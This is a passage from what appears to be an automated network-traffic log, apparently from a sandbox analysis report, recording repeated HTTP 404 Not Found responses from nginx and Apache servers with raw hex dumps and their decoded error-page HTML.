e2 66 1a 93 38 86 f8 f7 49 10 c1 fe 0a b6 c4 ef 98 b5 10 48 ff 7a ff ee 3f 4a 9c 44 58 3d d7 59 09 89 28 6e 60 10 6b 41 e1 36 9b 12 3e 14 80 41 55 23 8a 85 a9 46 7f 11 2b 11 54 49 95 f0 6c fa 70 14 25 db 25 e5 e3 82 b8 f3 45 22 e2 3d 66 ed 7d c0 7a 0a 09 c8 55 71 4a 27 97 18 54 cb 8f ae 9f 74 f5 57 51 64 ae 04 a2 cc a1 13 75 0e e8 6e 1e 23 5a b1 41 28 4a 91 01 de 93 75 f2 99 4e d2 8f d2 46 9c 46 24 49 23 9f 4b 14 02 27 58 09 85 01 a9 f9 c4 75 fe 92 18 86 11 7d 4a 3e 6f c4 ca c0 69 61 e0 f8 de a5 e6 07 b5 05 8f e2 1d cf 9c f3 93 9c d1 07 11 7f 9b da a3 ae 85 4f c7 e9 de a6 0e 51 9d db 54 57 55 1b 9f 03 73 98 8d c0 c7 77 90 cd b6 c8 c4 97 97 da e4 72 5b ac ed 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:49:57 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:50:00 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:50:03 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:50:06 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:50:24 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:50:27 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:50:30 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:50:32 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:50:38 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:50:41 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:50:44 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:50:47 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b12d1b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:51:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a 